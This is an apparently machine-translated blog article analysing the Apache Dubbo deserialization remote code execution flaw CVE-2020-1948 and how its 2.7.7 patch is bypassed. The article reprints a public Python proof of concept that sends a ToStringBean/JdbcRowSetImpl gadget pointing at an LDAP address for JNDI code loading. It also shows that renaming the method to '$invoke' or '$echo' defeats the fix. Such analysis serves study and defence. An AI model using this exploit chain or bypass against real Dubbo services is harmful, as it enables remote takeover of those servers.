Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to deserialize Apache dubbo remote code execution vulnerabilities and their patches to bypass in-depth analysis, the content of the article is of high quality, so the editor will share it for you to do a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Introduction to Apache Dubbo

Dubbo is a distributed services framework dedicated to providing high-performance and transparent RPC remote service invocation solutions, as well as SOA service governance solutions. To put it simply, dubbo is a service framework. If there is no distributed requirement, it does not need to be used. Only when it is distributed, there is a need for a distributed service framework like dubbo, and it is essentially a service invocation. To put it bluntly, it is a distributed framework for remote service invocation (bid farewell to WSdl in the Web Service pattern and register on dubbo as a server and consumer). Its core includes:

Remote communication: provides abstract encapsulation of a variety of long-connection-based NIO frameworks, including multiple thread models, serialization, and information exchange in the "request-response" pattern.

Cluster fault tolerance: provides transparent remote procedure calls based on interface methods, including multi-protocol support, as well as soft load balancing, failure fault tolerance, address routing, dynamic configuration and other cluster support.

Automatic discovery: based on the registry directory service, the service consumer can dynamically find the service provider, make the address transparent, and enable the service provider to smoothly increase or decrease the number of machines.

The following figure shows the workflow and principles from the official website of Apache dubbo

Provider

The exposed service party calls it a "service provider".

Consumer

The invoking remote service party calls it "service consumer".

Registry

The central directory service for service registration and discovery is called "service registry".

Monitor

The log service that counts the invocation time of the service is called "service monitoring center".

Container

The service runs the container.

Provider registers the locally provided remote methods in the registry. When Consumer needs to be called, it will first go to the registry for query, and then call the corresponding remote methods in the corresponding Provider according to the results returned by the registry. If there is any change, the registry will push the change data to Consumer based on the persistent connection.

Start the registry, the registry recommended by Apache dubbo when the Apache ZooKeeper registry download address https://zookeeper.apache.org/releases.html

You can customize and modify the values of clientPort and dataDir in the "/ conf/zoo.cfg" configuration file before starting ZooKeeper.

Apache Dubbo has a web-side management interface github address as follows: https://github.com/apache/dubbo-admin

After the download is completed, go to the / dubbo-admin-server/src/main/resources directory to modify the application.properties configuration file and change the address of the registry to the address of the registry started by yourself.

Run mvn package-Dmaven.test.skip=true under the dubbo-admin-server directory to package the module into a jar package

Then java-jar dubbo-admin-server-0.2.0-SNAPSHOT.jar starts dubbo-admin-server, which starts the dubbo-managed server but does not have a UI interface.

Go to dubbo-admin-ui to execute npm install and execute npm run dev after the command execution is completed.

When you access http://localhost:8081, you will have UI interface. The default account password is root. In the service query, we can see the remote method service registered by Provider in the Zookeeper registry. Currently, there is no data available because it is not registered.

Start the program we wrote using the dubbo framework

You can see that our remote method service has successfully registered with the zookeeper registry

CVE-2020-1948 depth analysis

First of all, take a look at the POC code that has been published on the Internet.

From hessian2 import new_objectfrom client import DubboClientclient = DubboClient ('127.0.0.1, 20880) JdbcRowSetImpl=new_object (' com.sun.rowset.JdbcRowSetImpl', dataSource= "ldap://127.0.0.1:8087/ExploitMac", strMatchColumns= ["fxx"]) JdbcRowSetImplClass=new_object ('java.lang.Class', name= "com.sun.rowset.JdbcRowSetImpl",) toStringBean=new_object (' com.rometools.rome.feed.impl.ToStringBean' BeanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl) resp = client.send_request_and_return_response (service_name='com.example.provider.service.UesrService', method_name='test', args= [toStringBean])

It is not difficult to see that the exploit chain ends up calling jndi through JdbcRowSetImpl for remote code execution. At the same time, we found that com.rometools.rome.feed.impl.ToStringBean is used in the gadget, so we need to add a reference to rometools in the pom.xml of Provider.

Com.rometoolsrome1.7.0

Take a look at the content of the message sent by POC through wireshark grabbing the packet.

We type the breakpoint on line 57 of org.apache.dubbo.remoting.transport.DecodeHandler.

After following up the method, we can see that an if judgment will be made in the method first. After the judgment is completed, the DecodeableRpcInvocation.decode () method will be called and passed in two parameters, one of which is an inputStream parameter. Let's take a closer look at the content of this parameter.

You can see that it is the serialized data that we send through POC

Following this method, there is an if judgment at line 131, where the desc parameter is processed by RefctUtils.desc2classArray () and a class object of ToStringBean is returned.

Then the class object of ToStringBean is deserialized into ToStringBean object through Hessian and assigned to the args parameter

If you take a closer look at the details of the ToStringBean object that args points to at this time, you can see that two properties of the ToStringBean object have been assigned to JdbcRowSetImpl.

After the execution of the current method, the args parameter and the pts parameter are assigned to the arguments property and the parameterTypes property of the current object, respectively, and the current DecodeableRpcInvocation is returned as a parameter.

Back in DecodeHandler, the message parameter passed in line 51 is a Request object, which is in dubbo's package. Take a brief look at the details of this object

Follow up on the method, and then continue to follow the handleRequest () method.

A RemotingException will be thrown after an if judgment in the 263 line of code in the DubboProtocol class. The key point is here. You can see that string concatenation is used in the passed parameters. When string concatenation is used, the append method of the object of StringBuilder is automatically called, and the return value of channel.getRemoteAddress (), channel.getLocalAddress () and getInvocationWithoutData (inv) are processed in turn. The return value of getInvocationWithoutData (inv) officially contains the malicious request DecodeableRpcInvocation object. StringBuilder calls the toString method of DecodeableRpcInvocation to convert it into a string.

RpcInvocation, the parent class of the DecodeableRpcInvocation class, overrides the toString method to see the implementation of the RpcInvocation.toString () method

It is also string concatenation, where Arrays.toString (arguments) and agruments are the ToStringBean objects encapsulated in the DecodeableRpcInvocation object before. The ToStringBean.toString () method is then naturally called.

The ToStringBean.toString () method, which takes out the obj property to get its class name and passes it as an argument to another overridden toString method

The toString method constantly calls various methods of the JdbcRowSetImpl object through reflection. When reflection calls the getDatabaseMetaData method of the JdbcRowSetImpl object, it will trigger JDNI to remotely access the dataSource.

We can see the value of dataSource

At this point, the principle of remote code execution vulnerability in Apache dubbo (CVE-2020-1948) deserialization has been analyzed.

Patch bypass analysis

This patch for this vulnerability is very simple. When analyzing the vulnerability, it was said that there was an if judgment in line 131 of the DecodeableRpcInvocation class. The following is the code for this judgment in version 2.7.6.

The code of the judgment in the updated version 2.7.7 is as follows, it can be seen that an if judgment has been added to the judgment, and if the judgment fails, an IllegalArgumentException will be thrown to terminate the execution of the current thread.

So how to bypass this judgment and let the program continue to trigger remote code execution, let's take a closer look at the RpcUtils.isGenericCall () method.

It is not difficult to find out whether the method parameter is the same as the $INVOKE constant or the $INVOKE_ASYNC constant using only the String.equals method in this method.

Let's take a look at the values of two constants.

When the value of method is "test", we can see that it is not the same. Then we enter the RpcUtils.isEcho () method, which is also compared with the constant. Obviously, the result is also different.

So the final result in if judgment is true, which terminates execution with an exception. Compared to the way to bypass, we just need to make the value of method equal to "$invoke", "$invokeAsync" or "$echo". We return to POC to see which value corresponds to method

You can see at a glance that the method_name is what we are looking for, and we only need to change the 'test'' to'$invoke''to bypass the current patch.

The vulnerability is that after the data serialized to the background is deserialized, a dangerous operation is performed during an exception handling in the subsequent processing, thus triggering gadget.

On how to deserialize Apache dubbo remote code execution vulnerabilities and their patches to bypass in-depth analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.